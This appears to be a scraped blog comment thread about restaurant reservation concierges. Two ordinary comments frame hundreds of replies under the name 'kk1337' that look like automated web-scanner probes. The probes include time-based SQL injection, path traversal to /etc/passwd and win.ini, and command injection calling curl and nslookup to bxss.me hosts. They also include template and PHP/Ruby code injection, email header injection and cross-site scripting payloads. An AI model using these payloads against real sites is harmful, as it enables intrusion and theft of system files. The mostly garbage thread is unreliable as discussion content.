(select 198766*667891)
re: JJ
(select 198766*667891 from DUAL)
It's a little odd to me to imagine a restaurant would on one hand not use online booking, but on the other be ok with robots calling (/harassing) them to make reservations. That being said Pecotter and the likes often come on top of google search, so maybe they work,,, or maybe they have really good SEO.
re: kk1337
3dPXIlKr
re: kk1337
1*
re: kk1337
1*
re: kk1337
1*
re: kk1337
1*
re: kk1337
-1 OR 2+923-923-1=0+0+0+1
re: kk1337
-1 OR 3+923-923-1=0+0+0+1
re: kk1337
grqrBmak
re: kk1337
1*
re: kk1337
1*
re: kk1337
1*
re: kk1337
1*
re: kk1337
-1 OR 2+808-808-1=0+0+0+1
re: kk1337
-1 OR 3+808-808-1=0+0+0+1
re: kk1337
if(now()=sysdate(),sleep(15),0)
re: kk1337
if(now()=sysdate(),sleep(15),0)
re: kk1337
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
1 waitfor delay '0:0:15' --
re: kk1337
1 waitfor delay '0:0:15' --
re: kk1337
UBnryigN'; waitfor delay '0:0:15' --
re: kk1337
aKBETc9q'; waitfor delay '0:0:15' --
re: kk1337
-5 OR 171=(SELECT 171 FROM PG_SLEEP(15))--
re: kk1337
-5 OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: kk1337
-5) OR 745=(SELECT 745 FROM PG_SLEEP(15))--
re: kk1337
-5) OR 388=(SELECT 388 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 954=(SELECT 954 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 253=(SELECT 253 FROM PG_SLEEP(15))--
re: kk1337
xoDC3nnK' OR 929=(SELECT 929 FROM PG_SLEEP(15))--
re: kk1337
c5yzRdfN' OR 269=(SELECT 269 FROM PG_SLEEP(15))--
re: kk1337
eWwQDsSG') OR 450=(SELECT 450 FROM PG_SLEEP(15))--
re: kk1337
T3E2AtOe') OR 895=(SELECT 895 FROM PG_SLEEP(15))--
re: kk1337
vo03ngz2')) OR 260=(SELECT 260 FROM PG_SLEEP(15))--
re: kk1337
s6ydlbeL')) OR 865=(SELECT 865 FROM PG_SLEEP(15))--
re: kk1337
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
1'"
re: kk1337
@@lWQNd
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
1'"
re: kk1337
@@4ePME
re: kk1337
1E09G0e4O
re: kk1337
%0abcc:074625.67-13745.67.59ad6.19990.2@bxss.me
re: kk1337
to@example.com>%0d%0abcc:074625.67-13746.67.59ad6.19990.2@bxss.me
re: kk1337
response.write(9364609*9727312)
re: kk1337
'+response.write(9364609*9727312)+'
re: kk1337
<esi:include src="http://bxss.me/rpb.png"/>
re: kk1337
"+response.write(9364609*9727312)+"
re: kk1337
${9999090+9999333}
re: kk1337
../../../../../../../../../../../../../../etc/passwd
re: kk1337
../../../../../../../../../../../../../../windows/win.ini
re: kk1337
file:///etc/passwd
re: kk1337
../../../../../../../../../../../../../../../proc/version
re: kk1337
'.gethostbyname(lc('hitza'.'ckfqntwpbec85.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(65).chr(99).chr(77).'
re: kk1337
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: kk1337
".gethostbyname(lc("hitzd"."ynnnbebj0ae59.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(72).chr(107).chr(88)."
re: kk1337
../../../../../../../../../../etc/passwd%00.jpg
re: kk1337
)
re: kk1337
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: kk1337
!(()&&!|*|*|
re: kk1337
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: kk1337
^(#$!@#$)(()))******
re: kk1337
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: kk1337
/etc/passwd
re: kk1337
echo vjcvqg$()\ sfqmkr\nz^xyu||a #' &echo vjcvqg$()\ sfqmkr\nz^xyu||a #|" &echo vjcvqg$()\ sfqmkr\nz^xyu||a #
re: kk1337
%2fetc%2fpasswd
re: kk1337
&echo pvrndt$()\ kfvtmw\nz^xyu||a #' &echo pvrndt$()\ kfvtmw\nz^xyu||a #|" &echo pvrndt$()\ kfvtmw\nz^xyu||a #
re: kk1337
/.././.././.././.././.././.././.././../etc/./passwd%00
re: kk1337
HttP://bxss.me/t/xss.html?%00
re: kk1337
|echo xgvylj$()\ orjerk\nz^xyu||a #' |echo xgvylj$()\ orjerk\nz^xyu||a #|" |echo xgvylj$()\ orjerk\nz^xyu||a #
re: kk1337
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: kk1337
bxss.me/t/xss.html?%00
re: kk1337
"+"A".concat(70-3).concat(22*4).concat(103).concat(80).concat(106).concat(88)+(require"socket"
Socket.gethostbyname("hitnr"+"pwnaddor328b7.bxss.me.")[3].to_s)+"
re: kk1337
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: kk1337
(nslookup hiteifntwulpqc727d.bxss.me||perl -e "gethostbyname('hiteifntwulpqc727d.bxss.me')")
re: kk1337
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: kk1337
'+'A'.concat(70-3).concat(22*4).concat(121).concat(86).concat(102).concat(75)+(require'socket'
Socket.gethostbyname('hitrk'+'taqmlnswff046.bxss.me.')[3].to_s)+'
re: kk1337
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: kk1337
$(nslookup hitwxzuyvcgubbce0c.bxss.me||perl -e "gethostbyname('hitwxzuyvcgubbce0c.bxss.me')")
re: kk1337
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: kk1337
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: kk1337
Http://bxss.me/t/fit.txt
re: kk1337
&nslookup hitemaxdluiyi22fd1.bxss.me&'\"`0&nslookup hitemaxdluiyi22fd1.bxss.me&`'
re: kk1337
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kk1337
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: kk1337
http://bxss.me/t/fit.txt%3F.jpg
re: kk1337
&(nslookup hitjnjdabjsvy61d58.bxss.me||perl -e "gethostbyname('hitjnjdabjsvy61d58.bxss.me')")&'\"`0&(nslookup hitjnjdabjsvy61d58.bxss.me||perl -e "gethostbyname('hitjnjdabjsvy61d58.bxss.me')")&`'
re: kk1337
';print(md5(31337));$a='
re: kk1337
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: kk1337
/etc/shells
re: kk1337
|(nslookup hitvfswumhivef3f1a.bxss.me||perl -e "gethostbyname('hitvfswumhivef3f1a.bxss.me')")
re: kk1337
";print(md5(31337));$a="
re: kk1337
'"
re: kk1337
file:///etc/passwd
re: kk1337
c:/windows/win.ini
re: kk1337
`(nslookup hithzvqdumdjib8ca0.bxss.me||perl -e "gethostbyname('hithzvqdumdjib8ca0.bxss.me')")`
re: kk1337
${@print(md5(31337))}
re: kk1337
<!--
re: kk1337
/\../\../\../\../\../\../\../etc/passwd
re: kk1337
bxss.me
re: kk1337
;(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")|(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")&(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")
re: kk1337
${@print(md5(31337))}\
re: kk1337
/WEB-INF/web.xml
re: kk1337
'.print(md5(31337)).'
re: kk1337
C:\WINDOWS\system32\drivers\etc\hosts
re: kk1337
../../../../../../../../../../windows/win.ini%00.jpg
re: kk1337
/../../../../../../../../../../boot.ini
re: kk1337
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: kk1337
..\..\..\..\..\..\..\..\windows\win.ini
re: kk1337
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: kk1337
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: kk1337
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: kk1337
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: kk1337
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: kk1337
WEB-INF/web.xml
re: kk1337
WEB-INF\web.xml
re: kk1337
1
re: kk1337
1
re: kk1337
-1 OR 2+616-616-1=0+0+0+1 --
re: kk1337
-1 OR 3+616-616-1=0+0+0+1 --
re: kk1337
-1 OR 2+314-314-1=0+0+0+1
re: kk1337
-1 OR 3+314-314-1=0+0+0+1
re: kk1337
-1' OR 2+690-690-1=0+0+0+1 --
re: kk1337
-1' OR 3+690-690-1=0+0+0+1 --
re: kk1337
-1' OR 2+734-734-1=0+0+0+1 or 'zMG3VXdL'='
re: kk1337
-1' OR 3+734-734-1=0+0+0+1 or 'zMG3VXdL'='
re: kk1337
-1" OR 2+497-497-1=0+0+0+1 --
re: kk1337
-1" OR 3+497-497-1=0+0+0+1 --
re: kk1337
if(now()=sysdate(),sleep(15),0)
re: kk1337
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
1 waitfor delay '0:0:15' --
re: kk1337
h6amh7JU'; waitfor delay '0:0:15' --
re: kk1337
-5 OR 533=(SELECT 533 FROM PG_SLEEP(15))--
re: kk1337
-5) OR 593=(SELECT 593 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 499=(SELECT 499 FROM PG_SLEEP(15))--
re: kk1337
8hBytlFE' OR 686=(SELECT 686 FROM PG_SLEEP(15))--
re: kk1337
3G9xJLK8') OR 212=(SELECT 212 FROM PG_SLEEP(15))--
re: kk1337
2hfC0I4m')) OR 408=(SELECT 408 FROM PG_SLEEP(15))--
re: kk1337
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
1'"
re: kk1337
@@w5Szg
re: kk1337
1
re: kk1337
1
re: kk1337
1
re: kk1337
1
re: kk1337
1
re: kk1337
1
re: kk1337
1RNFVG7II0
re: kk1337
response.write(9149618*9585281)
re: kk1337
'+response.write(9149618*9585281)+'
re: kk1337
"+response.write(9149618*9585281)+"
re: kk1337
<esi:include src="http://bxss.me/rpb.png"/>
re: kk1337
${10000358+9999542}
re: kk1337
../../../../../../../../../../../../../../etc/passwd
re: kk1337
../../../../../../../../../../../../../../windows/win.ini
re: kk1337
file:///etc/passwd
re: kk1337
../
re: kk1337
)
re: kk1337
redirtest.acx
re: kk1337
!(()&&!|*|*|
re: kk1337
^(#$!@#$)(()))******
re: kk1337
ctime
sleep
p0
(I30
tp1
Rp2
.
re: kk1337
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: kk1337
'.gethostbyname(lc('hitjq'.'ecobbkuua0e41.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(71).chr(101).chr(74).'
re: kk1337
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: kk1337
".gethostbyname(lc("hitqo"."mzoslysi75c31.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(69).chr(99).chr(80)."
re: kk1337
/etc/shells
re: kk1337
gethostbyname(lc('hitud'.'psjlldew79924.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(82).chr(121).chr(68)
re: kk1337
echo jfosfj$()\ nfkpfj\nz^xyu||a #' &echo jfosfj$()\ nfkpfj\nz^xyu||a #|" &echo jfosfj$()\ nfkpfj\nz^xyu||a #
re: kk1337
../../../../../../../../../../../../../../etc/shells
re: kk1337
&echo cprqty$()\ iagzsr\nz^xyu||a #' &echo cprqty$()\ iagzsr\nz^xyu||a #|" &echo cprqty$()\ iagzsr\nz^xyu||a #
re: kk1337
c:/windows/win.ini
re: kk1337
|echo mucqxg$()\ rtfntx\nz^xyu||a #' |echo mucqxg$()\ rtfntx\nz^xyu||a #|" |echo mucqxg$()\ rtfntx\nz^xyu||a #
re: kk1337
HttP://bxss.me/t/xss.html?%00
re: kk1337
bxss.me
re: kk1337
expr 9000270128 - 929964
re: kk1337
bxss.me/t/xss.html?%00
re: kk1337
Http://bxss.me/t/fit.txt
re: kk1337
(nslookup -q=cname hitjohspxqckieb947.bxss.me||curl hitjohspxqckieb947.bxss.me))
re: kk1337
http://bxss.me/t/fit.txt?.jpg
re: kk1337
$(nslookup -q=cname hittsepwasusi97f23.bxss.me||curl hittsepwasusi97f23.bxss.me)
re: kk1337
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kk1337
"+"A".concat(70-3).concat(22*4).concat(114).concat(68).concat(116).concat(75)+(require"socket"
Socket.gethostbyname("hitgk"+"bfahbnnsd3dfc.bxss.me.")[3].to_s)+"
re: kk1337
&nslookup -q=cname hitfjkznhdpfr2da61.bxss.me&'\"`0&nslookup -q=cname hitfjkznhdpfr2da61.bxss.me&`'
re: kk1337
';print(md5(31337));$a='
re: kk1337
'+'A'.concat(70-3).concat(22*4).concat(102).concat(75).concat(101).concat(86)+(require'socket'
Socket.gethostbyname('hitax'+'zbkjgsuobe3b3.bxss.me.')[3].to_s)+'
re: kk1337
&(nslookup -q=cname hitlojcvwxwho26b26.bxss.me||curl hitlojcvwxwho26b26.bxss.me)&'\"`0&(nslookup -q=cname hitlojcvwxwho26b26.bxss.me||curl hitlojcvwxwho26b26.bxss.me)&`'
re: kk1337
";print(md5(31337));$a="
re: kk1337
'A'.concat(70-3).concat(22*4).concat(102).concat(80).concat(102).concat(78)+(require'socket'
Socket.gethostbyname('hitnr'+'fcokjwyb32924.bxss.me.')[3].to_s)
re: kk1337
|(nslookup -q=cname hitswdfcfxpvi44eb4.bxss.me||curl hitswdfcfxpvi44eb4.bxss.me)
re: kk1337
${@print(md5(31337))}
re: kk1337
'"()
re: kk1337
`(nslookup -q=cname hitjqjagklcuc8b9d7.bxss.me||curl hitjqjagklcuc8b9d7.bxss.me)`
re: kk1337
${@print(md5(31337))}\
re: kk1337
'&&sleep(27*1000)*xdxhsr&&'
re: kk1337
replies
re: kk1337
;(nslookup -q=cname hituylgntbsfcfb919.bxss.me||curl hituylgntbsfcfb919.bxss.me)|(nslookup -q=cname hituylgntbsfcfb919.bxss.me||curl hituylgntbsfcfb919.bxss.me)&(nslookup -q=cname hituylgntbsfcfb919.bxss.me||curl hituylgntbsfcfb919.bxss.me)
re: kk1337
'.print(md5(31337)).'
re: kk1337
'"
re: kk1337
"&&sleep(27*1000)*cymiln&&"
re: kk1337
replies
re: kk1337
|(nslookup${IFS}-q${IFS}cname${IFS}hithgobbimnyx511ac.bxss.me||curl${IFS}hithgobbimnyx511ac.bxss.me)
re: kk1337
<!--
re: kk1337
'||sleep(27*1000)*eqssfo||'
re: kk1337
replies/.
re: kk1337
&(nslookup${IFS}-q${IFS}cname${IFS}hityipzruwngf7cc46.bxss.me||curl${IFS}hityipzruwngf7cc46.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hityipzruwngf7cc46.bxss.me||curl${IFS}hityipzruwngf7cc46.bxss.me)&`'
re: kk1337
"||sleep(27*1000)*igacbw||"
re: kk1337
'"()&%<zzz><ScRiPt >f0er(9256)</ScRiPt>
re: kk1337
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitvpfuegkjewc3a0a.bxss.me")}}
re: kk1337
'"()&%<zzz><ScRiPt >f0er(9634)</ScRiPt>
re: kk1337
9863663
re: kk1337
KTs85VMs
re: kk1337
*1
re: kk1337
*1
re: kk1337
*1
re: kk1337
*1
re: kk1337
-1 OR 5*5=25 --
re: kk1337
-1 OR 5*5=26 --
re: kk1337
-1 OR 5*5=25
re: kk1337
-1 OR 5*5=26
re: kk1337
*if(now()=sysdate(),sleep(15),0)
re: kk1337
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
-1 waitfor delay '0:0:15' --
re: kk1337
33oYOpWz'; waitfor delay '0:0:15' --
re: kk1337
-1 OR 901=(SELECT 901 FROM PG_SLEEP(15))--
re: kk1337
-1) OR 629=(SELECT 629 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 46=(SELECT 46 FROM PG_SLEEP(15))--
re: kk1337
sgOvBytE' OR 274=(SELECT 274 FROM PG_SLEEP(15))--
re: kk1337
t3gehDgT') OR 436=(SELECT 436 FROM PG_SLEEP(15))--
re: kk1337
WJn7GQHu')) OR 841=(SELECT 841 FROM PG_SLEEP(15))--
re: kk1337
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
'"
re: kk1337
@@8SOtm
re: kk1337
(select 198766*667891)
re: kk1337
(select 198766*667891 from DUAL)
I think it should be like all other online concierges. They might have partnership with certain restaurants, whereas others they only will call but there is likely no hope of getting a reservation.
